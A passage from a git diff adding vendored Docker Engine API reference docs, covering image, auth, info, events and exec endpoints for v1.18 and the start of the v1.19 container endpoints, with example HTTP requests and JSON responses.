no error +- **500** – server error + +#### Create an image + +`POST /images/create` + +Create an image either by pulling it from the registry or by importing it + +**Example request**: + + POST /v1.18/images/create?fromImage=busybox&tag=latest HTTP/1.1 + +**Example response**: + + HTTP/1.1 200 OK + Content-Type: application/json + + {"status": "Pulling..."} + {"status": "Pulling", "progress": "1 B/ 100 B", "progressDetail": {"current": 1, "total": 100}} + {"error": "Invalid..."} + ... + +When using this endpoint to pull an image from the registry, the +`X-Registry-Auth` header can be used to include +a base64-encoded AuthConfig object. + +**Query parameters**: + +- **fromImage** – Name of the image to pull. +- **fromSrc** – Source to import. The value may be a URL from which the image + can be retrieved or `-` to read the image from the request body. +- **repo** – Repository name. +- **tag** – Tag. If empty when pulling an image, this causes all tags + for the given image to be pulled. + +**Request Headers**: + +- **X-Registry-Auth** – base64-encoded AuthConfig object + +**Status codes**: + +- **200** – no error +- **404** - repository does not exist or no read access +- **500** – server error + + + +#### Inspect an image + +`GET /images/(name)/json` + +Return low-level information on the image `name` + +**Example request**: + + GET /v1.18/images/ubuntu/json HTTP/1.1 + +**Example response**: + + HTTP/1.1 200 OK + Content-Type: application/json + + { + "Created": "2013-03-23T22:24:18.818426-07:00", + "Container": "3d67245a8d72ecf13f33dffac9f79dcdf70f75acb84d308770391510e0c23ad0", + "ContainerConfig": { + "Hostname": "", + "User": "", + "AttachStdin": false, + "AttachStdout": false, + "AttachStderr": false, + "Tty": true, + "OpenStdin": true, + "StdinOnce": false, + "Env": null, + "Cmd": ["/bin/bash"], + "Dns": null, + "Image": "ubuntu", + "Labels": { + "com.example.vendor": "Acme", + "com.example.license": "GPL", + "com.example.version": "1.0" + }, + "Volumes": null, + "VolumesFrom": "", + "WorkingDir": "" + }, + "Id": "b750fe79269d2ec9a3c593ef05b4332b1d1a02a62b4accb2c21d589ff2f5f2dc", + "Parent": "27cf784147099545", + "Size": 6824592 + } + +**Status codes**: + +- **200** – no error +- **404** – no such image +- **500** – server error + +#### Get the history of an image + +`GET /images/(name)/history` + +Return the history of the image `name` + +**Example request**: + + GET /v1.18/images/ubuntu/history HTTP/1.1 + +**Example response**: + + HTTP/1.1 200 OK + Content-Type: application/json + + [ + { + "Id": "b750fe79269d", + "Created": 1364102658, + "CreatedBy": "/bin/bash" + }, + { + "Id": "27cf78414709", + "Created": 1364068391, + "CreatedBy": "" + } + ] + +**Status codes**: + +- **200** – no error +- **404** – no such image +- **500** – server error + +#### Push an image on the registry + +`POST /images/(name)/push` + +Push the image `name` on the registry + +**Example request**: + + POST /v1.18/images/test/push HTTP/1.1 + +**Example response**: + + HTTP/1.1 200 OK + Content-Type: application/json + + {"status": "Pushing..."} + {"status": "Pushing", "progress": "1/? (n/a)", "progressDetail": {"current": 1}}} + {"error": "Invalid..."} + ... + +If you wish to push an image on to a private registry, that image must already have a tag +into a repository which references that registry `hostname` and `port`. This repository name should +then be used in the URL. This duplicates the command line's flow. + +**Example request**: + + POST /v1.18/images/registry.acme.com:5000/test/push HTTP/1.1 + + +**Query parameters**: + +- **tag** – The tag to associate with the image on the registry. This is optional. + +**Request Headers**: + +- **X-Registry-Auth** – base64-encoded AuthConfig object. + +**Status codes**: + +- **200** – no error +- **404** – no such image +- **500** – server error + +#### Tag an image into a repository + +`POST /images/(name)/tag` + +Tag the image `name` into a repository + +**Example request**: + + POST /v1.18/images/test/tag?repo=myrepo&force=0&tag=v42 HTTP/1.1 + +**Example response**: + + HTTP/1.1 201 Created + +**Query parameters**: + +- **repo** – The repository to tag in +- **force** – 1/True/true or 0/False/false, default false +- **tag** - The new tag name + +**Status codes**: + +- **201** – no error +- **400** – bad parameter +- **404** – no such image +- **409** – conflict +- **500** – server error + +#### Remove an image + +`DELETE /images/(name)` + +Remove the image `name` from the filesystem + +**Example request**: + + DELETE /v1.18/images/test HTTP/1.1 + +**Example response**: + + HTTP/1.1 200 OK + Content-type: application/json + + [ + {"Untagged": "3e2f21a89f"}, + {"Deleted": "3e2f21a89f"}, + {"Deleted": "53b4f83ac9"} + ] + +**Query parameters**: + +- **force** – 1/True/true or 0/False/false, default false +- **noprune** – 1/True/true or 0/False/false, default false + +**Status codes**: + +- **200** – no error +- **404** – no such image +- **409** – conflict +- **500** – server error + +#### Search images + +`GET /images/search` + +Search for an image on [Docker Hub](https://hub.docker.com). + +> **Note**: +> The response keys have changed from API v1.6 to reflect the JSON +> sent by the registry server to the docker daemon's request. + +**Example request**: + + GET /v1.18/images/search?term=sshd HTTP/1.1 + +**Example response**: + + HTTP/1.1 200 OK + Content-Type: application/json + + [ + { + "star_count": 12, + "is_official": false, + "name": "wma55/u1210sshd", + "is_automated": false, + "description": "" + }, + { + "star_count": 10, + "is_official": false, + "name": "jdswinbank/sshd", + "is_automated": false, + "description": "" + }, + { + "star_count": 18, + "is_official": false, + "name": "vgauthier/sshd", + "is_automated": false, + "description": "" + } + ... + ] + +**Query parameters**: + +- **term** – term to search + +**Status codes**: + +- **200** – no error +- **500** – server error + +### 2.3 Misc + +#### Check auth configuration + +`POST /auth` + +Get the default username and email + +**Example request**: + + POST /v1.18/auth HTTP/1.1 + Content-Type: application/json + + { + "username": "hannibal", + "password": "xxxx", + "email": "hannibal@a-team.com", + "serveraddress": "https://index.docker.io/v1/" + } + +**Example response**: + + HTTP/1.1 200 OK + +**Status codes**: + +- **200** – no error +- **204** – no error +- **500** – server error + +#### Display system-wide information + +`GET /info` + +Display system-wide information + +**Example request**: + + GET /v1.18/info HTTP/1.1 + +**Example response**: + + HTTP/1.1 200 OK + Content-Type: application/json + + { + "Containers": 11, + "Debug": 0, + "DockerRootDir": "/var/lib/docker", + "Driver": "btrfs", + "DriverStatus": [[""]], + "ExecutionDriver": "native-0.1", + "HttpProxy": "http://test:test@localhost:8080", + "HttpsProxy": "https://test:test@localhost:8080", + "ID": "7TRN:IPZB:QYBB:VPBQ:UMPP:KARE:6ZNR:XE6T:7EWV:PKF4:ZOJD:TPYS", + "IPv4Forwarding": 1, + "Images": 16, + "IndexServerAddress": "https://index.docker.io/v1/", + "InitPath": "/usr/bin/docker", + "InitSha1": "", + "KernelVersion": "3.12.0-1-amd64", + "Labels": [ + "storage=ssd" + ], + "MemTotal": 2099236864, + "MemoryLimit": 1, + "NCPU": 1, + "NEventsListener": 0, + "NFd": 11, + "NGoroutines": 21, + "Name": "prod-server-42", + "NoProxy": "9.81.1.160", + "OperatingSystem": "Boot2Docker", + "RegistryConfig": { + "IndexConfigs": { + "docker.io": { + "Mirrors": null, + "Name": "docker.io", + "Official": true, + "Secure": true + } + }, + "InsecureRegistryCIDRs": [ + "127.0.0.0/8" + ] + }, + "SwapLimit": 0, + "SystemTime": "2015-03-10T11:11:23.730591467-07:00" + } + +**Status codes**: + +- **200** – no error +- **500** – server error + +#### Show the docker version information + +`GET /version` + +Show the docker version information + +**Example request**: + + GET /v1.18/version HTTP/1.1 + +**Example response**: + + HTTP/1.1 200 OK + Content-Type: application/json + + { + "Version": "1.5.0", + "Os": "linux", + "KernelVersion": "3.18.5-tinycore64", + "GoVersion": "go1.4.1", + "GitCommit": "a8a31ef", + "Arch": "amd64", + "ApiVersion": "1.18" + } + +**Status codes**: + +- **200** – no error +- **500** – server error + +#### Ping the docker server + +`GET /_ping` + +Ping the docker server + +**Example request**: + + GET /v1.18/_ping HTTP/1.1 + +**Example response**: + + HTTP/1.1 200 OK + Content-Type: text/plain + + OK + +**Status codes**: + +- **200** - no error +- **500** - server error + +#### Create a new image from a container's changes + +`POST /commit` + +Create a new image from a container's changes + +**Example request**: + + POST /v1.18/commit?container=44c004db4b17&comment=message&repo=myrepo HTTP/1.1 + Content-Type: application/json + + { + "Hostname": "", + "Domainname": "", + "User": "", + "AttachStdin": false, + "AttachStdout": true, + "AttachStderr": true, + "PortSpecs": null, + "Tty": false, + "OpenStdin": false, + "StdinOnce": false, + "Env": null, + "Cmd": [ + "date" + ], + "Volumes": { + "/tmp": {} + }, + "WorkingDir": "", + "NetworkDisabled": false, + "ExposedPorts": { + "22/tcp": {} + } + } + +**Example response**: + + HTTP/1.1 201 Created + Content-Type: application/json + + {"Id": "596069db4bf5"} + +**JSON parameters**: + +- **config** - the container's configuration + +**Query parameters**: + +- **container** – source container +- **repo** – repository +- **tag** – tag +- **comment** – commit message +- **author** – author (e.g., "John Hannibal Smith + <[hannibal@a-team.com](mailto:hannibal%40a-team.com)>") + +**Status codes**: + +- **201** – no error +- **404** – no such container +- **500** – server error + +#### Monitor Docker's events + +`GET /events` + +Get container events from docker, in real time via streaming. + +Docker containers report the following events: + + create, destroy, die, exec_create, exec_start, export, kill, oom, pause, restart, start, stop, unpause + +Docker images report the following events: + + untag, delete + +**Example request**: + + GET /v1.18/events?since=1374067924 + +**Example response**: + + HTTP/1.1 200 OK + Content-Type: application/json + + {"status": "create", "id": "dfdf82bd3881","from": "ubuntu:latest", "time":1374067924} + {"status": "start", "id": "dfdf82bd3881","from": "ubuntu:latest", "time":1374067924} + {"status": "stop", "id": "dfdf82bd3881","from": "ubuntu:latest", "time":1374067966} + {"status": "destroy", "id": "dfdf82bd3881","from": "ubuntu:latest", "time":1374067970} + +**Query parameters**: + +- **since** – Timestamp. Show all events created since timestamp and then stream +- **until** – Timestamp. Show events created until given timestamp and stop streaming +- **filters** – A json encoded value of the filters (a map[string][]string) to process on the event list. Available filters: + - `container=`; -- container to filter + - `event=`; -- event to filter + - `image=`; -- image to filter + +**Status codes**: + +- **200** – no error +- **500** – server error + +#### Get a tarball containing all images in a repository + +`GET /images/(name)/get` + +Get a tarball containing all images and metadata for the repository specified +by `name`. + +If `name` is a specific name and tag (e.g. ubuntu:latest), then only that image +(and its parents) are returned. If `name` is an image ID, similarly only that +image (and its parents) are returned, but with the exclusion of the +'repositories' file in the tarball, as there were no image names referenced. + +See the [image tarball format](#image-tarball-format) for more details. + +**Example request** + + GET /v1.18/images/ubuntu/get + +**Example response**: + + HTTP/1.1 200 OK + Content-Type: application/x-tar + + Binary data stream + +**Status codes**: + +- **200** – no error +- **500** – server error + +#### Get a tarball containing all images + +`GET /images/get` + +Get a tarball containing all images and metadata for one or more repositories. + +For each value of the `names` parameter: if it is a specific name and tag (e.g. +`ubuntu:latest`), then only that image (and its parents) are returned; if it is +an image ID, similarly only that image (and its parents) are returned and there +would be no names referenced in the 'repositories' file for this image ID. + +See the [image tarball format](#image-tarball-format) for more details. + +**Example request** + + GET /v1.18/images/get?names=myname%2Fmyapp%3Alatest&names=busybox + +**Example response**: + + HTTP/1.1 200 OK + Content-Type: application/x-tar + + Binary data stream + +**Status codes**: + +- **200** – no error +- **500** – server error + +#### Load a tarball with a set of images and tags into docker + +`POST /images/load` + +Load a set of images and tags into a Docker repository. +See the [image tarball format](#image-tarball-format) for more details. + +**Example request** + + POST /v1.18/images/load + Content-Type: application/x-tar + + Tarball in body + +**Example response**: + + HTTP/1.1 200 OK + +**Status codes**: + +- **200** – no error +- **500** – server error + +#### Image tarball format + +An image tarball contains one directory per image layer (named using its long ID), +each containing these files: + +- `VERSION`: currently `1.0` - the file format version +- `json`: detailed layer information, similar to `docker inspect layer_id` +- `layer.tar`: A tarfile containing the filesystem changes in this layer + +The `layer.tar` file contains `aufs` style `.wh..wh.aufs` files and directories +for storing attribute changes and deletions. + +If the tarball defines a repository, the tarball should also include a `repositories` file at +the root that contains a list of repository and tag names mapped to layer IDs. + +``` +{"hello-world": + {"latest": "565a9d68a73f6706862bfe8409a7f659776d4d60a8d096eb4a3cbce6999cc2a1"} +} +``` + +#### Exec Create + +`POST /containers/(id or name)/exec` + +Sets up an exec instance in a running container `id` + +**Example request**: + + POST /v1.18/containers/e90e34656806/exec HTTP/1.1 + Content-Type: application/json + + { + "AttachStdin": true, + "AttachStdout": true, + "AttachStderr": true, + "Cmd": ["sh"], + "Tty": true + } + +**Example response**: + + HTTP/1.1 201 Created + Content-Type: application/json + + { + "Id": "f90e34656806", + "Warnings":[] + } + +**JSON parameters**: + +- **AttachStdin** - Boolean value, attaches to `stdin` of the `exec` command. +- **AttachStdout** - Boolean value, attaches to `stdout` of the `exec` command. +- **AttachStderr** - Boolean value, attaches to `stderr` of the `exec` command. +- **Tty** - Boolean value to allocate a pseudo-TTY. +- **Cmd** - Command to run specified as a string or an array of strings. + + +**Status codes**: + +- **201** – no error +- **404** – no such container + +#### Exec Start + +`POST /exec/(id)/start` + +Starts a previously set up `exec` instance `id`. If `detach` is true, this API +returns after starting the `exec` command. Otherwise, this API sets up an +interactive session with the `exec` command. + +**Example request**: + + POST /v1.18/exec/e90e34656806/start HTTP/1.1 + Content-Type: application/json + + { + "Detach": false, + "Tty": false + } + +**Example response**: + + HTTP/1.1 200 OK + Content-Type: application/vnd.docker.raw-stream + + {% raw %} + {{ STREAM }} + {% endraw %} + +**JSON parameters**: + +- **Detach** - Detach from the `exec` command. +- **Tty** - Boolean value to allocate a pseudo-TTY. + +**Status codes**: + +- **200** – no error +- **404** – no such exec instance + +**Stream details**: + +Similar to the stream behavior of `POST /containers/(id or name)/attach` API + +#### Exec Resize + +`POST /exec/(id)/resize` + +Resizes the `tty` session used by the `exec` command `id`. The unit is number of characters. +This API is valid only if `tty` was specified as part of creating and starting the `exec` command. + +**Example request**: + + POST /v1.18/exec/e90e34656806/resize?h=40&w=80 HTTP/1.1 + Content-Type: text/plain + +**Example response**: + + HTTP/1.1 201 Created + Content-Type: text/plain + +**Query parameters**: + +- **h** – height of `tty` session +- **w** – width + +**Status codes**: + +- **201** – no error +- **404** – no such exec instance + +#### Exec Inspect + +`GET /exec/(id)/json` + +Return low-level information about the `exec` command `id`. + +**Example request**: + + GET /v1.18/exec/11fb006128e8ceb3942e7c58d77750f24210e35f879dd204ac975c184b820b39/json HTTP/1.1 + +**Example response**: + + HTTP/1.1 200 OK + Content-Type: plain/text + + { + "ID" : "11fb006128e8ceb3942e7c58d77750f24210e35f879dd204ac975c184b820b39", + "Running" : false, + "ExitCode" : 2, + "ProcessConfig" : { + "privileged" : false, + "user" : "", + "tty" : false, + "entrypoint" : "sh", + "arguments" : [ + "-c", + "exit 2" + ] + }, + "OpenStdin" : false, + "OpenStderr" : false, + "OpenStdout" : false, + "Container" : { + "State" : { + "Running" : true, + "Paused" : false, + "Restarting" : false, + "OOMKilled" : false, + "Pid" : 3650, + "ExitCode" : 0, + "Error" : "", + "StartedAt" : "2014-11-17T22:26:03.717657531Z", + "FinishedAt" : "0001-01-01T00:00:00Z" + }, + "ID" : "8f177a186b977fb451136e0fdf182abff5599a08b3c7f6ef0d36a55aaf89634c", + "Created" : "2014-11-17T22:26:03.626304998Z", + "Path" : "date", + "Args" : [], + "Config" : { + "Hostname" : "8f177a186b97", + "Domainname" : "", + "User" : "", + "AttachStdin" : false, + "AttachStdout" : false, + "AttachStderr" : false, + "PortSpecs": null, + "ExposedPorts" : null, + "Tty" : false, + "OpenStdin" : false, + "StdinOnce" : false, + "Env" : [ "PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin" ], + "Cmd" : [ + "date" + ], + "Image" : "ubuntu", + "Volumes" : null, + "WorkingDir" : "", + "Entrypoint" : null, + "NetworkDisabled" : false, + "MacAddress" : "", + "OnBuild" : null, + "SecurityOpt" : null + }, + "Image" : "5506de2b643be1e6febbf3b8a240760c6843244c41e12aa2f60ccbb7153d17f5", + "NetworkSettings" : { + "IPAddress" : "172.17.0.2", + "IPPrefixLen" : 16, + "MacAddress" : "02:42:ac:11:00:02", + "Gateway" : "172.17.42.1", + "Bridge" : "docker0", + "PortMapping" : null, + "Ports" : {} + }, + "ResolvConfPath" : "/var/lib/docker/containers/8f177a186b977fb451136e0fdf182abff5599a08b3c7f6ef0d36a55aaf89634c/resolv.conf", + "HostnamePath" : "/var/lib/docker/containers/8f177a186b977fb451136e0fdf182abff5599a08b3c7f6ef0d36a55aaf89634c/hostname", + "HostsPath" : "/var/lib/docker/containers/8f177a186b977fb451136e0fdf182abff5599a08b3c7f6ef0d36a55aaf89634c/hosts", + "LogPath": "/var/lib/docker/containers/1eb5fabf5a03807136561b3c00adcd2992b535d624d5e18b6cdc6a6844d9767b/1eb5fabf5a03807136561b3c00adcd2992b535d624d5e18b6cdc6a6844d9767b-json.log", + "Name" : "/test", + "Driver" : "aufs", + "ExecDriver" : "native-0.2", + "MountLabel" : "", + "ProcessLabel" : "", + "AppArmorProfile" : "", + "RestartCount" : 0, + "Volumes" : {}, + "VolumesRW" : {} + } + } + +**Status codes**: + +- **200** – no error +- **404** – no such exec instance +- **500** - server error + +## 3. Going further + +### 3.1 Inside `docker run` + +As an example, the `docker run` command line makes the following API calls: + +- Create the container + +- If the status code is 404, it means the image doesn't exist: + - Try to pull it. + - Then, retry to create the container. + +- Start the container. + +- If you are not in detached mode: +- Attach to the container, using `logs=1` (to have `stdout` and + `stderr` from the container's start) and `stream=1` + +- If in detached mode or only `stdin` is attached, display the container's id. + +### 3.2 Hijacking + +In this version of the API, `/attach`, uses hijacking to transport `stdin`, +`stdout`, and `stderr` on the same socket. + +To hint potential proxies about connection hijacking, Docker client sends +connection upgrade headers similarly to websocket. + + Upgrade: tcp + Connection: Upgrade + +When Docker daemon detects the `Upgrade` header, it switches its status code +from **200 OK** to **101 UPGRADED** and resends the same headers. + +This might change in the future. + +### 3.3 CORS Requests + +To set cross origin requests to the Engine API please give values to +`--api-cors-header` when running Docker in daemon mode. Set * (asterisk) allows all, +default or blank means CORS disabled + + $ docker -d -H="192.168.1.9:2375" --api-cors-header="http://foo.bar" diff --git a/vendor/github.com/docker/docker/docs/api/v1.19.md b/vendor/github.com/docker/docker/docs/api/v1.19.md new file mode 100644 index 0000000000..a1a7280d3a --- /dev/null +++ b/vendor/github.com/docker/docker/docs/api/v1.19.md @@ -0,0 +1,2238 @@ +--- +title: "Engine API v1.19" +description: "API Documentation for Docker" +keywords: "API, Docker, rcli, REST, documentation" +redirect_from: +- /engine/reference/api/docker_remote_api_v1.19/ +- /reference/api/docker_remote_api_v1.19/ +--- + + + +## 1. Brief introduction + + - The daemon listens on `unix:///var/run/docker.sock` but you can + [Bind Docker to another host/port or a Unix socket](../reference/commandline/dockerd.md#bind-docker-to-another-host-port-or-a-unix-socket). + - The API tends to be REST. However, for some complex commands, like `attach` + or `pull`, the HTTP connection is hijacked to transport `stdout`, + `stdin` and `stderr`. + - When the client API version is newer than the daemon's, these calls return an HTTP + `400 Bad Request` error message. + +## 2. Endpoints + +### 2.1 Containers + +#### List containers + +`GET /containers/json` + +List containers + +**Example request**: + + GET /v1.19/containers/json?all=1&before=8dfafdbc3a40&size=1 HTTP/1.1 + +**Example response**: + + HTTP/1.1 200 OK + Content-Type: application/json + + [ + { + "Id": "8dfafdbc3a40", + "Names":["/boring_feynman"], + "Image": "ubuntu:latest", + "Command": "echo 1", + "Created": 1367854155, + "Status": "Exit 0", + "Ports": [{"PrivatePort": 2222, "PublicPort": 3333, "Type": "tcp"}], + "Labels": { + "com.example.vendor": "Acme", + "com.example.license": "GPL", + "com.example.version": "1.0" + }, + "SizeRw": 12288, + "SizeRootFs": 0 + }, + { + "Id": "9cd87474be90", + "Names":["/coolName"], + "Image": "ubuntu:latest", + "Command": "echo 222222", + "Created": 1367854155, + "Status": "Exit 0", + "Ports": [], + "Labels": {}, + "SizeRw": 12288, + "SizeRootFs": 0 + }, + { + "Id": "3176a2479c92", + "Names":["/sleepy_dog"], + "Image": "ubuntu:latest", + "Command": "echo 3333333333333333", + "Created": 1367854154, + "Status": "Exit 0", + "Ports":[], + "Labels": {}, + "SizeRw":12288, + "SizeRootFs":0 + }, + { + "Id": "4cb07b47f9fb", + "Names":["/running_cat"], + "Image": "ubuntu:latest", + "Command": "echo 444444444444444444444444444444444", + "Created": 1367854152, + "Status": "Exit 0", + "Ports": [], + "Labels": {}, + "SizeRw": 12288, + "SizeRootFs": 0 + } + ] + +**Query parameters**: + +- **all** – 1/True/true or 0/False/false, Show all containers. + Only running containers are shown by default (i.e., this defaults to false) +- **limit** – Show `limit` last created + containers, include non-running ones. +- **since** – Show only containers created since Id, include + non-running ones. +- **before** – Show only containers created before Id, include + non-running ones. +- **size** – 1/True/true or 0/False/false, Show the containers + sizes +- **filters** - a JSON encoded value of the filters (a `map[string][]string`) to process on the containers list. Available filters: + - `exited=`; -- containers with exit code of `` ; + - `status=`(`restarting`|`running`|`paused`|`exited`) + - `label=key` or `label="key=value"` of a container label + +**Status codes**: + +- **200** – no error +- **400** – bad parameter +- **500** – server error + +#### Create a container + +`POST /containers/create` + +Create a container + +**Example request**: + + POST /v1.19/containers/create HTTP/1.1 + Content-Type: application/json + + { + "Hostname": "", + "Domainname": "", + "User": "", + "AttachStdin": false, + "AttachStdout": true, + "AttachStderr": true, + "Tty": false, + "OpenStdin": false, + "StdinOnce": false, + "Env": [ + "FOO=bar", + "BAZ=quux" + ], + "Cmd": [ + "date" + ], + "Entrypoint": null, + "Image": "ubuntu", + "Labels": { + "com.example.vendor": "Acme", + "com.example.license": "GPL", + "com.example.version": "1.0" + }, + "Volumes": { + "/volumes/data": {} + }, + "WorkingDir": "", + "NetworkDisabled": false, + "MacAddress": "12:34:56:78:9a:bc", + "ExposedPorts": { + "22/tcp": {} + }, + "HostConfig": { + "Binds": ["/tmp:/tmp"], + "Links": ["redis3:redis"], + "LxcConf": {"lxc.utsname":"docker"}, + "Memory": 0, + "MemorySwap": 0, + "CpuShares": 512, + "CpuPeriod": 100000, + "CpuQuota": 50000, + "CpusetCpus": "0,1", + "CpusetMems": "0,1", + "BlkioWeight": 300, + "OomKillDisable": false, + "PidMode": "", + "PortBindings": { "22/tcp": [{ "HostPort": "11022" }] }, + "PublishAllPorts": false, + "Privileged": false, + "ReadonlyRootfs": false, + "Dns": ["8.8.8.8"], + "DnsSearch": [""], + "ExtraHosts": null, + "VolumesFrom": ["parent", "other:ro"], + "CapAdd": ["NET_ADMIN"], + "CapDrop": ["MKNOD"], + "RestartPolicy": { "Name": "", "MaximumRetryCount": 0 }, + "NetworkMode": "bridge", + "Devices": [], + "Ulimits": [{}], + "LogConfig": { "Type": "json-file", "Config": {} }, + "SecurityOpt": [], + "CgroupParent": "" + } + } + +**Example response**: + + HTTP/1.1 201 Created + Content-Type: application/json + + { + "Id":"e90e34656806", + "Warnings":[] + } + +**JSON parameters**: + +- **Hostname** - A string value containing the hostname to use for the + container. +- **Domainname** - A string value containing the domain name to use + for the container. +- **User** - A string value specifying the user inside the container. +- **AttachStdin** - Boolean value, attaches to `stdin`. +- **AttachStdout** - Boolean value, attaches to `stdout`. +- **AttachStderr** - Boolean value, attaches to `stderr`. +- **Tty** - Boolean value, Attach standard streams to a `tty`, including `stdin` if it is not closed. +- **OpenStdin** - Boolean value, opens `stdin`, +- **StdinOnce** - Boolean value, close `stdin` after the 1 attached client disconnects. +- **Env** - A list of environment variables in the form of `["VAR=value", ...]` +- **Labels** - Adds a map of labels to a container. To specify a map: `{"key":"value", ... }` +- **Cmd** - Command to run specified as a string or an array of strings. +- **Entrypoint** - Set the entry point for the container as a string or an array + of strings. +- **Image** - A string specifying the image name to use for the container. +- **Volumes** - An object mapping mount point paths (strings) inside the + container to empty objects. +- **WorkingDir** - A string specifying the working directory for commands to + run in. +- **NetworkDisabled** - Boolean value, when true disables networking for the + container +- **ExposedPorts** - An object mapping ports to an empty object in the form of: + `"ExposedPorts": { "/: {}" }` +- **HostConfig** + - **Binds** – A list of bind-mounts for this container. Each item is a string in one of these forms: + + `host-src:container-dest` to bind-mount a host path into the + container. Both `host-src`, and `container-dest` must be an + _absolute_ path. + + `host-src:container-dest:ro` to make the bind-mount read-only + inside the container. Both `host-src`, and `container-dest` must be + an _absolute_ path. + - **Links** - A list of links for the container. Each link entry should be + in the form of `container_name:alias`. + - **LxcConf** - LXC specific configurations. These configurations only + work when using the `lxc` execution driver. + - **Memory** - Memory limit in bytes. + - **MemorySwap** - Total memory limit (memory + swap); set `-1` to enable unlimited swap. + You must use this with `memory` and make the swap value larger than `memory`. + - **CpuShares** - An integer value containing the container's CPU Shares + (ie. the relative weight vs other containers). + - **CpuPeriod** - The length of a CPU period in microseconds. + - **CpuQuota** - Microseconds of CPU time that the container can get in a CPU period. + - **CpusetCpus** - String value containing the `cgroups CpusetCpus` to use. + - **CpusetMems** - Memory nodes (MEMs) in which to allow execution (0-3, 0,1). Only effective on NUMA systems. + - **BlkioWeight** - Block IO weight (relative weight) accepts a weight value between 10 and 1000. + - **OomKillDisable** - Boolean value, whether to disable OOM Killer for the container or not. + - **PidMode** - Set the PID (Process) Namespace mode for the container; + `"container:"`: joins another container's PID namespace + `"host"`: use the host's PID namespace inside the container + - **PortBindings** - A map of exposed container ports and the host port they + should map to. A JSON object in the form + `{ /: [{ "HostPort": "" }] }` + Take note that `port` is specified as a string and not an integer value. + - **PublishAllPorts** - Allocates a random host port for all of a container's + exposed ports. Specified as a boolean value. + - **Privileged** - Gives the container full access to the host. Specified as + a boolean value. + - **ReadonlyRootfs** - Mount the container's root filesystem as read only. + Specified as a boolean value. + - **Dns** - A list of DNS servers for the container to use. + - **DnsSearch** - A list of DNS search domains + - **ExtraHosts** - A list of hostnames/IP mappings to add to the + container's `/etc/hosts` file. Specified in the form `["hostname:IP"]`. + - **VolumesFrom** - A list of volumes to inherit from another container. + Specified in the form `[:]` + - **CapAdd** - A list of kernel capabilities to add to the container. + - **Capdrop** - A list of kernel capabilities to drop from the container. + - **RestartPolicy** – The behavior to apply when the container exits. The + value is an object with a `Name` property of either `"always"` to + always restart or `"on-failure"` to restart only when the container + exit code is non-zero. If `on-failure` is used, `MaximumRetryCount` + controls the number of times to retry before giving up. + The default is not to restart. (optional) + An ever increasing delay (double the previous delay, starting at 100mS) + is added before each restart to prevent flooding the server. + - **NetworkMode** - Sets the networking mode for the container. Supported + values are: `bridge`, `host`, `none`, and `container:` + - **Devices** - A list of devices to add to the container specified as a JSON object in the + form + `{ "PathOnHost": "/dev/deviceName", "PathInContainer": "/dev/deviceName", "CgroupPermissions": "mrw"}` + - **Ulimits** - A list of ulimits to set in the container, specified as + `{ "Name": , "Soft": , "Hard": }`, for example: + `Ulimits: { "Name": "nofile", "Soft": 1024, "Hard": 2048 }` + - **SecurityOpt**: A list of string values to customize labels for MLS + systems, such as SELinux. + - **LogConfig** - Log configuration for the container, specified as a JSON object in the form + `{ "Type": "", "Config": {"key1": "val1"}}`. + Available types: `json-file`, `syslog`, `journald`, `none`. + `syslog` available options are: `address`. + - **CgroupParent** - Path to `cgroups` under which the container's `cgroup` is created. If the path is not absolute, the path is considered to be relative to the `cgroups` path of the init process. Cgroups are created if they do not already exist. + +**Query parameters**: + +- **name** – Assign the specified name to the container. Must + match `/?[a-zA-Z0-9_-]+`. + +**Status codes**: + +- **201** – no error +- **400** – bad parameter +- **404** – no such container +- **406** – impossible to attach (container not running) +- **409** – conflict +- **500** – server error + +#### Inspect a container + +`GET /containers/(id or name)/json` + +Return low-level information on the container `id` + +**Example request**: + + GET /v1.19/containers/4fa6e0f0c678/json HTTP/1.1 + +**Example response**: + + HTTP/1.1 200 OK + Content-Type: application/json + + { + "AppArmorProfile": "", + "Args": [ + "-c", + "exit 9" + ], + "Config": { + "AttachStderr": true, + "AttachStdin": false, + "AttachStdout": true, + "Cmd": [ + "/bin/sh", + "-c", + "exit 9" + ], + "Domainname": "", + "Entrypoint": null, + "Env": [ + "PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin" + ], + "ExposedPorts": null, + "Hostname": "ba033ac44011", + "Image": "ubuntu", + "Labels": { + "com.example.vendor": "Acme", + "com.example.license": "GPL", + "com.example.version": "1.0" + }, + "MacAddress": "", + "NetworkDisabled": false, + "OnBuild": null, + "OpenStdin": false, + "PortSpecs": null, + "StdinOnce": false, + "Tty": false, + "User": "", + "Volumes": null, + "WorkingDir": "" + }, + "Created": "2015-01-06T15:47:31.485331387Z", + "Driver": "devicemapper", + "ExecDriver": "native-0.2", + "ExecIDs": null, + "HostConfig": { + "Binds": null, + "BlkioWeight": 0, + "CapAdd": null, + "CapDrop": null, + "ContainerIDFile": "", + "CpusetCpus": "", + "CpusetMems": "", + "CpuShares": 0, + "CpuPeriod": 100000, + "Devices": [], + "Dns": null, + "DnsSearch": null, + "ExtraHosts": null, + "IpcMode": "", + "Links": null, + "LxcConf": [], + "Memory": 0, + "MemorySwap": 0, + "OomKillDisable": false, + "NetworkMode": "bridge", + "PidMode": "", + "PortBindings": {}, + "Privileged": false, + "ReadonlyRootfs": false, + "PublishAllPorts": false, + "RestartPolicy": { + "MaximumRetryCount": 2, + "Name": "on-failure" + }, + "LogConfig": { + "Config": null, + "Type": "json-file" + }, + "SecurityOpt": null, + "VolumesFrom": null, + "Ulimits": [{}] + }, + "HostnamePath": "/var/lib/docker/containers/ba033ac4401106a3b513bc9d639eee123ad78ca3616b921167cd74b20e25ed39/hostname", + "HostsPath": "/var/lib/docker/containers/ba033ac4401106a3b513bc9d639eee123ad78ca3616b921167cd74b20e25ed39/hosts", + "LogPath": "/var/lib/docker/containers/1eb5fabf5a03807136561b3c00adcd2992b535d624d5e18b6cdc6a6844d9767b/1eb5fabf5a03807136561b3c00adcd2992b535d624d5e18b6cdc6a6844d9767b-json.log", + "Id": "ba033ac4401106a3b513bc9d639eee123ad78ca3616b921167cd74b20e25ed39", + "Image": "04c5d3b7b0656168630d3ba35d8889bd0e9caafcaeb3004d2bfbc47e7c5d35d2", + "MountLabel": "", + "Name": "/boring_euclid", + "NetworkSettings": { + "Bridge": "", + "Gateway": "", + "IPAddress": "", + "IPPrefixLen": 0, + "MacAddress": "", + "PortMapping": null, + "Ports": null + }, + "Path": "/bin/sh", + "ProcessLabel": "", + "ResolvConfPath": 